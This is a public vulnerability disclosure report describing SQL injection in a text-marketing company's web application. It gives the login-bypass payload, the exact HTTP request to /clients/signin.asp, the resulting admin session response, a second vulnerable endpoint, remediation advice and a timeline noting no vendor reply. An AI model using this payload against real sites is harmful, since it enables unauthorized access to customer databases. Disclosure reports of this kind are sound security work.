This report was fully disclosed on 19 August 2020

Summary

Due to the lack of input santization it is possible to perform an SQL injection against various end-points on the web application. Using a common SQL injection technique it was possible to bypass authentication and login as an administrative user.

About Text Logistics: “Text Logistics provides easy to use tools to help you connect with your customers and promote retention while gaining valuable insight and information. We provide text marketing, appointment reminders, click-to-call service and instant group text alerts.”

Proof of Concept

For a proof of concept we will target the /clients/signin.asp end-point. It was noted that the following end-point was also vulnerable /appstoreredirect.asp?id=1.

To exploit this vulnerability we can simply input -1' OR 1=1 into the username field and click submit.

The subsequent request will look like the following

POST /clients/signin.asp HTTP/1.1
Host: www.textlogistics.com
Connection: close
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
User-Agent: Hacker 7.23

email=-1%27+OR+1%3D1%16&password=

image tooltip here

we should receive the following response, indicating we have successfully logged in.

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Location: welcome.asp
Server: Microsoft-IIS/8.5
Set-Cookie: memberID=1517; path=/
Set-Cookie: [REDACTED]; path=/
Set-Cookie: [REDACTED]; secure; path=/
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Wed, 26 Feb 2020 03:30:33 GMT
Connection: close
Content-Length: 132

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="welcome.asp">here</a>.</body>

image tooltip here

It is important to note that while this proof of concept only demonstrates an authentication bypass, it would be possible for an attacker to download the entire application database, make modifications, and even perform remote command execution.

image tooltip here

  • Implement proper input santization to prevent SQLi and other injection attacks.
  • Inspect logs to determine if unauthorized access to the database has occurred.
  • Implement security and bug reporting information such as a security.txt file so security researchers can more easily report findings in the future.
  • Perform a full penetration test of the web platform and API to identify further issues.

Response From Affected Party

At the time of publishing no response has been received.

Timeline

  • 26 February 2020: Affected Party Notified
  • 19 August 2020: Report Published (+175 days)